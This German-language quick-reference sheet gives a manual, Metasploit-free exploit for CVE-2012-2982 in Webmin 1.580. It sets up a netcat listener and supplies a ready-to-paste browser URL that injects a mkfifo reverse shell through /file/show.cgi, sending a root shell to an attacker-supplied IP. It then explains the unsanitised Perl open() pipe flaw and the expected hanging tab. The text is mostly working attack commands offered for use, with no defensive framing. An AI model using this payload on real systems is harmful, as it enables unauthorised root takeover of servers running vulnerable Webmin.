
Manueller, authentifizierter Remote-Code-Execution-Exploit (RCE) ohne Metasploit über die Browser-URL-Leiste für Webmin 1.580 (CVE-2012-2982)
Schnellreferenz für die Ausführung authentifizierter Remote-Code-Execution (RCE) auf Webmin 1.580 über die Komponente /file/show.cgi.
Führen Sie diesen Befehl auf Ihrem lokalen Rechner aus, um die eingehende Verbindung entgegenzunehmen, bevor Sie die Payload ausführen:
rlwrap nc -lnvp 4444
Fügen Sie die folgende URL direkt in die Adressleiste Ihres Browsers ein (stellen Sie sicher, dass Sie zuvor im Webmin-Dashboard angemeldet sind):
http://127.0.0.1:10001/file/show.cgi/bin/sysinfo.cgi|rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <YOUR_ATTACK_IP> 4444 >/tmp/f|
Hinweis: Denken Sie daran, <YOUR_ATTACK_IP> durch Ihre tatsächliche lokale oder Tunnel-IP-Adresse zu ersetzen, sowie IP und PORT des Ziels.

Kontext & Details
Schwachstelle: Unzureichende Bereinigung der Inline-Pfadinformationen, die an die interne open()-Funktion von Perl in /file/show.cgi übergeben werden. Das Anhängen des Pipe-Zeichens (|) ermöglicht die Ausführung beliebiger Befehle mit Root-Rechten.
Authentifizierung: Hierfür ist eine aktive Sitzung erforderlich. Der Browser übernimmt die Authentifizierung automatisch, indem er beim Aufrufen der URL-Payload Ihre aktiven Sitzungscookies sendet.
Erwartetes Verhalten: Nach dem Drücken der Eingabetaste dreht sich der Browser-Tab und scheint auf unbestimmte Zeit zu hängen. Dies bestätigt, dass der Server-Thread erfolgreich gekapert wurde, um die interaktive Shell-Sitzung aufrechtzuerhalten.